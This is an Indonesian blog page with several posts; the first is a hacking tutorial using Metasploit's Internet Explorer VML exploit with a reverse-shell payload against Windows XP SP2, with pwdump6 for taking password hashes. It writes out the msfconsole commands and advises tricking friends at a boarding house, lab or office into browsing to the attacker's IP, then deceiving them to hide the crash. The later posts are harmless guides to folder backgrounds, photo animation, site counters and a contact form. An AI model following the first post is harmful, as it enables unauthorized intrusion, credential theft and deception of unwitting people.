Belajar nGehack 0 comments

Belajar Hack Yuck! (3) - Hack Windows XP SP2
Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.
Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. [Photo] Cetak halaman ini Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.
Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!
Pertama2 jalankan ‘mfsconsole’!
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution. This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja ).

Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit

Read Next . . . .

Cara Membuat Blog 0 comments

Penulis catatan harian di internet atau halaman web. Blogger ini merupakan pengguna internet yang rajin mengisi weblog. Salah satu kiprah Blogger yang signifikan di tahun 2004 adalah keterlibatan mereka dalam kampanye calon presiden Amerika Serikat. Kubu John Kerry bahkan mendirikan weblog yang mencatat kegiatan kampanye sehari-hari calon presiden dari Partai Demokrat itu. Kalau nggak pengen ribet Download saja
DISINI

Dalam konvensi nasional kedua kubu, blogger juga mendapatkan porsi khusus. Undangan bagi para blogger untuk meliput gelaran tersebut sempat membuat iri jurnalis konvensional.

Adam L. Penenberg, kolumnis Wired, menyebut masa depan jurnalisme berada di tangan para blogger. Ia menyebut sekarang adalah saatnya bagi blogger untuk mencari berita sendiri dan bukan hanya mengomentari berita yang ada.

Hal itu terjadi dalam bencana gempa dan tsunami yang melanda Asia di penghujung 2004. Lusinan blogger di Srilanka, Thailand dan India memberikan laporan pandangan mata mereka tentang bencana yang melanda.

Read Next . . . .

Cara Membuat Background Flasdisk 0 comments

Memberi background gambar pada flash disk dan folder Windows Explorer anda
(For full text with comments please click on the title)




Pengen memberi gambar background untuk flashdisk maupun folder-folder dalam windows explorer anda? Mungkin 2 cara di bawah ini bisa anda gunakan untuk keperluan tersebut.

Berikut ini ada script yang bisa anda gunakan untuk memberi background pada windows explorer anda:

[extshellfolderviews]
{BE098140-A513-11D0-A3A4-00C04FD706EC} = {BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Atrributes=1
Iconarea_image=namafile.jpg
Iconarea_text=01x012c071d
[.shellclassinfo]
Confirmfileop=0

Langkah-langkahnya:
1. Copy script di atas dan paste di Notepad
2. Ubah namafile.jpg dalam script di atas dengan nama file gambar yang ingin anda jadikan background.
2. Simpan dengan nama file eksistensi Desktop.ini di folder yang ingin anda beri background. Jangan lupa letakkan pula gambar yang anda jadikan background dalam folder yang sama!.

Sudah silahkan refresh dan lihat hasilnya!




Kalau nggak pengen ribet Download saja
DISINI, tinggal di extract di folder yang ingin ubah gambar backgroundnya.

Sebaiknya gunakan background yang cerah, karena font default dari windows explorer berwarna hitam, supaya tulisannya tetap kelihatan. Anda juga bisa menggunakan software Backgound maker maupun folder tweker untuk mengubah font default windows yang berwarna hitam menjadi warna lain.

Untuk beberapa komputer cara di atas tidak berfungsi, entah kenapa saya sendiri kurang tahu sebabnya. Di komputer saya pun cara di atas tidak bisa, tapi di komputer teman saya dapat berfungsi dengan baik.

Tapi jangan berkecil hati dulu jika ternyata cara pertama di atas tidak bisa berjalan di komputer anda , masih ada solusi lain yakni dengan menggunakan software Background Maker. yang Bisa anda Download
DISINI



Cara Penggunaannya:
1. Taruh software Background Maker di folder yang ingin anda beri background
2. Jalankan Software Backgound Maker kemudian tekan next >
3. customize This Folder, pada Customize--> centang semuanya (3 pilihan)
4. Change Folder Template biarkan kosong trus Next > lagi
5. Modify Background and Filename Appereance
pilih Browse cari file gambar yang ingin anda gunakan untuk background. atau anda bisa langsung memilih menggunakan gambar background dari beberapa pilihan yang telah disediakan. tentukan juga Warna Text (kalau backgound anda gelap, ubah warna text dengan yang cerah supaya tulisannya kelihatan)
6. Add Folder comment biarkan kosong lalu klik Next >
7. Klik Finish

Sudah... Silahkan Refresh dan lihat hasilnya! kalau tidak sesuai anda bisa mengulangi lagi langkah-langkah diatas, hingga menemukan background yang lebih sesuai dengan keinginan anda. Selamat Bereksperimen!


Read Next . . . .

Membuat Photo Animasi 1 comments

Berhubungan dengaan animasi, memang dengan animasi bisa bikin hidup jadi hidup ( kaya iklan aja ). Ya dalam kesempatan kali ini akan coba di bahas tentang bagaimana cara membuat animasi gambar ataupun foto. Bagi para sobat (mulai sekarang saya akan membiasakan diri menyebut anda menjadi sobat, biar lebih familier ya) yang sudah terbiasa menggunakan program animasi semisal MacroMedia Flash Player ataupun teman-temannya sudah barang tentu bukan hal yang wah ataupun aneh, tapi bagi sekelompok orang seperti saya ini, membuat animasi foto adalah suatu hal yang sangat sulit sekali.
Adakah diantara para sobat blogger yang seperti saya? jika jawabannya ada ya kita emang senasib (hiduplah senasib), tapi jangan dulu patah semangat sobat blogger, pepatah bilang banyak jalan menuju rhoma (irama).. dalam hal inipun sama ada jalannya yakni kita bisa menggunakan jasa situs-situs pembuat animasi. Di internet buaanyak sekali situs pembuat animasi foto, jumlahnya ribuan atau bahkan jutaan. Nah sebagai contoh yaitu
http://www.slide.com

  1. Untuk menuju situs http://www.slide.com silahkan klik di sini
  2. Langkah pertama yaitu sobat harus daftar dahulu pada situs tersebut
  3. Klik tulisan Sign Up untuk melakukan pendaftaran (daftar gratis)
  4. Masukan alamat email sobat pada kolom yang disediakan. isi juga password yang diinginkan
  5. Jika sudah, silahkan klik tombol sign Up, dan otomatis sobat sudah masuk ke halaman account sobat
  6. Langkah selanjutnya adalah melakukan pembuatan animasi
  7. Klik style, untuk memilih gaya dari animasi
  8. Klik skin, untuk memilih bingkai animasi
  9. Klik Size untuk memilih ukuran
  10. Klik Tombol Select Image, lalu masukan foto/image yang ingin sobat masukan
  11. Klik tombol Upload untuk melakukan proses upload foto
  12. Jika proses upload selesai, klik tombolSave
  13. Copy kode HTML yang di berikan, lalu paste pada program notepad
  14. Klik tulisan Log Out untuk keluar dari situs tersebut. Silahkan tutup halaman browser
  15. Langkah selanjutnya adalah memasukan kode HTML animasi tersebut ke dalam blog sobat, nah untuk cara memasukan kode HTML sudah sering saya bahas pada postingan terdahulu, jika lupa silahkan klik di sini


Contoh gambar animasi dapat anda lihat disini :
klik di sini atau → di sini
Selamat mencoba N selamat berkarya

Read Next . . . .

Cara Pasang Statistik dan Tracker 0 comments

Salah satu blog tool sekaligus sebagai aksesori blog yang sering di gunakan oleh para blogger yakni memasang statistik dan tracker. Dengan adanya statistik blog, maka kita yang mpunya blog ataupun yang berkunjung pun dapat mengetahui berapa pengunjungkah yang pernah berkunjung ke blog kita. selain itu juga bisa sekaligus sebagai tracker yakni kita bisa mengetahui para pengunjung blog kita datang dari mana, apakah dari search engine, blog lain ataupun darimana saja kita dapat mengetahuinya.
Sekarang bagaimana caranya kita membuat statistik tersebut? cara yang mudah yaitu kita menggunakan situs penyedia statistik. Di internet banyak sekali situs penyedia statistik gratis, sebagai contoh adalah situs http://www.sitemeter.com. Berikut adalah contoh tool yang bisa kita pilih :



Untuk mendapatkannya silahkan ikuti langkah-langkah berikut :
  1. Silahkan kunjungi situs http://www.sitemeter.com.
  2. Klik tulisan Sign Up untuk melakukan pendaftaran
  3. Klik tombol bertuliskan Next
  4. Klik tombol Next lagi
  5. Isi semua tabel yang ada lalu klik tombol Next lagi
  6. Isi lagi tabel yang ada, lalu klik tombol Next lagi
  7. Klik tombol Next lagi
  8. Klik tombol Next lagi ( cape dech next..next tyuss )
  9. Setelah ada keterangan proses sign up selesai, anda harus melakukan veryfikasi, silahkan buka email yg anda berikan
  10. Buka email yang datang dari sitemeter.com, di dalamnya ada username dan password anda untuk login ke sitemeter.com
  11. Silahkan login dengan id anda
  12. Bila sudah login, Klik menu Manager
  13. Klik Menu Meter Style untuk memilih gaya dari site meter anda
  14. Pilih style yang anda sukai, kemudian klik tombol Select
  15. Klik menu HTML Code
  16. Klik tulisan Adding site Meter to a Blogger.com Site
  17. Copy semua kode HTML yang di berikan lalu paste pada Notepad
  18. Klik menu Logout untuk keluar dari situs tersebut
  19. Selesai, tinggal memasukan kode yang kita dapat ke dalam blog kita


Sekarang tugas kita adalah memasukan kode yang sudah kita dapat ke dalam blog, ikuti langkah- langkah berikut :

khusus blog dengan template klasik :
  1. Sign in di blogger dengan id anda
  2. Klik menu TEMPLATE
  3. Klik Edit HTML
  4. Klik Edit (yang ada pada bar menu browser anda)
  5. Klik Find (on this page)... ⇒ untuk mempercepat pencarian
  6. Tuliskan kata dimana anda ingin tempatkan, contoh di blog saya adalah blogger (karena dekat dengan tombol blogger) klik Find
  7. Copy & paste kode yang telah di simpan di notepad tadi, lalu klik tombol Preview untuk melihat perubahan yang terjadi
  8. Jika sudah cocok dengan perubahan tadi, Klik Save Template Changes. Selesai


Sedikit tambahan, bila anda ingin site meter posisinya berada di tengah-tengah, tinggal tambah kode di bawah ini

<center> ...kode site meter... </center>



Untuk blog dengan Template baru :
  1. Login di blogger dengan ID anda
  2. Klik menu layout
  3. Klik Elemen Halaman
  4. Klik Tambahkan sebuah Elemen Halaman
  5. Klik TAMBAHKAN KE BLOG pada menu HTML/JavaScript
  6. Tulis Judul site meter anda pada isian di sebelah form judul (bila ingin ada keterangan. kalau tidak, ya kosongkan saja)
  7. Copy & paste kode Site meter pada kolom isian
  8. Klik tombol Simpan Perubahan
  9. Klik Elemen yang baru anda buat tadi, tahan lalu pindahkan ke tempat yang anda inginkan ( di drag & drop)
  10. Klik tombol PRATINJAU untuk melihat perubahan yang baru di lakukan
  11. Bila sudah cocok dengan perubahan tadi, klik tombol SIMPAN
  12. Selesai


Untuk fungsi site meter sebagai tracker, silahkan anda login ke sitemeter.com trus ya acak-acak deh isinya pasti ketemu....


Selamat mencoba N moga misinya berhasil :d:D:…..

Read Next . . . .

CARA MEMBUAT KONTAK FORM 0 comments

Untuk memudahkan anda berkomunikasi dengan kerabat-kerabat ada baiknya anda menambahkan kontak for di blogger anda scriptnya bisa anda gunakan dibawah ini >>>


<form enctype="multipart/form-data" action="http://www.emailmeform.com/fid.php?formid=140716" method="post" accept-charset="UTF-8"gt;
<table border="0" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td>
<font face="Verdana" color="#000000" size="2"></font>
<div id="mainmsg" style=""> </div>

</td>
</tr>
</table>

<br/>

<table border="0" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">

<tr valign="top">
<td nowrap><font face="Verdana" color="#000000" size="2">Your Name</font></td>
<td>
<input maxlength="100" value="" name="FieldData0" size="30" type="text"/> </td>
</tr>

<tr valign="top">
<td nowrap><font face="Verdana" color="#000000" size="2">Your Email Address</font></td>
<td>
<input maxlength="100" value="" name="FieldData1" size="30" type="text"/> </td>
</tr>

<tr valign="top">
<td nowrap><font face="Verdana" color="#000000" size="2">Subject</font></td>
<td>
<input maxlength="100" value="" name="FieldData2" size="30" type="text"/> </td>
</tr>

<tr valign="top">
<td nowrap><font face="Verdana" color="#000000" size="2">Message</font></td>
<td>
<textarea rows="10" cols="45" name="FieldData3"></textarea><br/> </td>
</tr>

<tr>
<td colspan="2">
<table cellpadding="5" cellspacing="0" width="100%" bgcolor="#E4F8E4">
<tr bgcolor="#AAD6AA">
<td colspan="2"><font face="Verdana" color="#FFFFFF" size="2"><b>Image Verification</b></font></td>
</tr>
<tr>
<td style="padding: 2px;" width="10"><img id="captcha" src="http://www.emailmeform.com/turing.php"/></td>
<td valign="top"><font color="#000000">Please enter the text from the image</font> <br/><input maxlength="100" value="" name="Turing" size="10" type="text"/>
[ <a href="#" onclick=" document.getElementById('captcha').src = document.getElementById('captcha').src + '?' + (new Date()).getMilliseconds()">Refresh Image</a> ] [ <a href="http://www.emailmeform.com/?v=turing&pt=popup" onclick="window.open('http://www.emailmeform.com/?v=turing&pt=popup','_blank','width=400, height=300, left=' + (screen.width-450) + ', top=100');return false;">What's This?</a> ]
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td> </td>
<td align="right">
<input maxlength="100" style="display : none;" value="" name="hida2" size="3" type="text"/>
<input class="btn" value="Send email" name="Submit" type="submit"/> <input class="btn" value=" Clear " name="Clear" type="reset"/></td>
</tr>
<tr>
<td colspan="2" align="center">
<br/>
</td>
</tr>
</table>

</form>

Selamat mencoba semoga bermanfaat

Read Next . . . .
Subscribe to: Posts (Atom)
Terima kasih banyak sudah melihat Blog Anak Ulu Rawas, bagi sobat yang pengen konsultasi, berbagi cerita, pengalaman, bahkan berbisnis silahkan langsung klik icon yahoo messanger saya di bawah photo yach .....